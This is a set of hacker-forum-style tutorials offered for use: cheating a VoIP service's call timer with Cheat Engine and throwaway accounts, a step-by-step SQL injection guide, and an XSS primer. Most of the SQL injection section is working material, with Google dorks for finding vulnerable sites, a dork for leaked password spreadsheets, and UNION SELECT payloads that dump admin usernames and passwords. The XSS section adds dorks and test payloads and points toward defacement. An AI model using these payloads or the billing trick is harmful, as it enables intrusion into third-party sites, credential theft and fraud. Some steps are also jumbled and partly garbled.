Free Calling

---

Welcome back guys. I am here with a new tutorial for you. I know that each and everybody wants to call for free. The amazing thing about this tutorial is it works world wide.
So have fun.

First go to:
http://www.friendcaller.com/WebPhone/Client/FriendCaller.jnlp

INSTALL it

After it is fully installed, open friend caller from desktop. Then register.
Better is to use temp email.
Then go to your email and confirm your account and you will be credited $ 0.10 for free calls. So you can only call for 10 seconds for free but this what I made this tut so you can call free.

Now login.

Then click on phone Icon.

Now open cheat engine. [http://www.cheatengine.org/]

Now click on open process.

Then click on window list.
Then select friend caller. And open it.

Now dial number in friend caller. [First test your own number] and click call.

Now it will start ringing:.
Now in cheat engine, enable speed hack. Edit speed to 0.00
NOW ENJOY YOUR CALL. The timer will freeze. You can talk as much as you want. When you finish call, you will be only charged 0.02 but after your balance is finished, make new account and enjoy.

Hacking Websites using Sql injection….

---

This tut is for educational purpose only..m not at all responsible if some1 uses it intenionally or unintenionally to harm anyone.im not at all responsible for any crime or mischief caused…

Lets start…
I hope u have a little knowledge in sql so i bypass the introduction and pointing to the sql injection

ok buddiez lets start and kindly pay attention

let your mind think and its just a child play
Sql injection to newbies
1). Search for a vulnerable site.
Highlight one then press ctrl+c then ctrl+v at your browser address bar.allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=

…and this one is just priceless…
“login: *” “password= *” filetype:xls
inurl: -> is a search parameter in google so that it searches for results in the site’s url.
.php?5= -> is what i’m searching for in a url, SQL Injection works by adding a code after the = symbol. This is also commonly referred as a Dork.
Dork definition: It’s the part in the site’s url that tells you that it can be vulnerable to a certain SQL injection. Let’s take this exploit for example:
We will check it’s vulnerability by adding magic qoute (’) at the end of the url.
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login–
STEP 3.So the url will be like this:

http://www.site.com/news_archive.php?id=5'

And we hit enter and we got this result.

Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\’;
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1)

If you got an error, some text missing or a blank page the site is vulnerable but not at all.
Now we know that the site is vulnerable.
step .4.The next step is find out how many columns the database contain
To find it we use “order by” (without the qoute) and this string ” — ” (no qoute).

It will look like this:

http://www.site.com/news_archive.php?id=6 order by 1– (no error)
http://www.site.com/news_archive.php?id=6 order by 2– (no error)
http://www.site.com/news_archive.php?id=6 order by 3– (no error)
we move a little higher. (it doesn’t matter)
http://www.site.com/news_archive.php?id=6 order by 10– (no error)
http://www.site.com/news_archive.php?id=6 order by 14– (no error)
until we got an error:
http://www.site.com/news_archive.php?id=6 order by 15– (we got an error)

now we got an error on this column:it will lok like this.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15–;
mySQL Error: 1054 (Unknown column ‘15′ in ‘order clause’)
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column ‘15′ in ‘order clause’)
this mean the database contain only 14 columns

5.. Now use “-” (negative quote) and union select statement.
using this we can select more data in one sql statement.
Look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14–
we hit enter.
numbers appears..
Like this:
6
, 5
8
6.Now we will check it’s MYSQL VERSION. We will add @@version on the numbers appear on the previous step.
lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14–
and you will get a result like this:
6
, 5
5.1.32 <–this is the version 7.Getting Table Name.

We use group_concat(table_name).
replace @@version with group_concat(table_name)

and look like this:

http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14–
were not done already: (don’t hit enter)
between number 14 and this “–” (quote) insert this:
+from+information_schema.tables+where+table_schema=database()–

it will look like this:

http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()–
we hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_u ser_md5

8. Now we’re done on TABLE NAME, we move on to COLUMN NAME.
use this string group_concat(column_name)
replace group_concat(table_name) to group_concat(column_name).
but before that we must choose one column. i choose auth_user_md5 because this is must or what we want.

for better result we need to hex auth_user_md5.
Go to this Link: http://home2.paulschou.net/tools/xlate/
paste auth_user_md5 to the text box and click encode.
now we get the hex of auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35

before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435

Now replace group_concat(table_name) to group_concat(column_name).
like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()–
replace also +from+information_schema.tables+where+table_schema=database()–
to
+from+information_schema.columns+where+table_name=0×617574685f757365725f6d6435–
(The yellow letter and numbers is the auth_user_md5 hex we encoded)
Note: always add 0x before the hex. Like above.
Here is the result:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_name=0×617574685f757365725f6d6435–
Now hit enter: and you got result like this.
UserID,Username,Password,Perms,FirstName,MiddleName,LastName,Position,EmailAddre ss,ContactNumbers,DateCreated,CreatedBy,DateModified,ModifiedBy,Status
how to find a site is vunerable for sql injection

SQL VULNEREBILITY FINDER
u can find whether the site iz vulnerable for sql injection or not thru this link

Link : http://sql.wehostsite.com

Sql Commands [usefull For Injection]
Sql Commands [usefull For Injection]

ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language

CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database

DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification

LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database

Now we have both table name and column name,,then what is next??..find the username and password
Now let me show how to display the username and password stored in the DB.
There is a function called concat() that allows me to join the two columns and display on the page. Also I will be using :(colon) in the hex form. Its hex value is 0×3a(thats zero at beginning not alphabet o.)
What I do is:
replace (column_name) with (columnname,0×3a,anothercolumnname).
replace from information_schema.columns where table_schema=database()– with table name.
column name=a column name that you found(here it is admin)
another column name=another column name you found(here it is password)
table name=table name that you found(here it is admin)
Then the URL query will be like this
http://www.site.com/article.php?id=-5 UNION SELECT 1,2,group_concat(admin,0×3a,password),4,5,6,7 from admin

Cross Site Scripting / XSS Hacking

---

this tut is for educational purpose only..m not at all responsible if some1 uses it intenionally or unintenionally to harm anyone.im not at all responsible for any crime or mischief caused…

What is XSS ?
‘XSS’ also known as ‘CSS’ - Cross Site Scripting. It is a very common vulnerbility found in Web Applications, ‘XSS’ allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an “attacker” to inject some code into the applications affected in order to bypass access to the website or to apply “phishing” on falls users.

Types of XSS
There are actually three types of Cross-Site Scripting, commonly named as:
- DOM-Based XSS
- Non-persistent XSS
- Persistent XSS

DOM-Based : The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes “since born” some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.

The DOM-Based XSS exploits these problems on users local machines in this way:
- The attacker creates a well builded malicious website
- The ingenuous user opens that site
- The user has a vulnerable page on his machine
- The attacker’s website sends commands to the vulnerable HTML page
- The vulnerable local page execute that commands with the user’s privileges
on that machine.
- The attacker easily gain control on the victim computer.

Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It’s commonly named as “non-persistent” because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker’s client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn’t need to provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of “guestbooks”. Usually the users uses that kind of tool to leave messages to the owned of the website and at a first look it doesn’t seems something dangerous, but if an attacker discover that the system is vulnerable can insert some malicious code in his message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn’t do any check on the content of the inserted message: it just inserts the data provided from the user into the result page.

How to Find XSS Vulnerbilitys ?

Well to start finding these vulnerbilitys you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s, there are too many to mention.

Using ‘Google Dorks’ to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:”search.php?q=” now that is a common page and has alot of results. Also note that most sites have XSS vulnerbilitys, its just having a good eye, and some good knowledge on how to bypass there filteration.

Basics of XSS
Well now lets start learning some Actual Methods, the most common used XSS injection is :

alert(”The Hacker News”)

now this will alert a popup message, saying “The Hacker News” without quotes.

So,use “search.php?q=” and you can simple try the following on a website with the same thing,

http://website.com/search.php?q=alert(”The Hacker News”)

there are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :

http://website.com/search.php?q=

The Hacker News

if you see the bold text on the page and newlines then you knows its vulnerable.
now how to deface a website using XXS im leaving on u……
njoy:)
remember:-olwaz hack to learnr,neve learn to hack….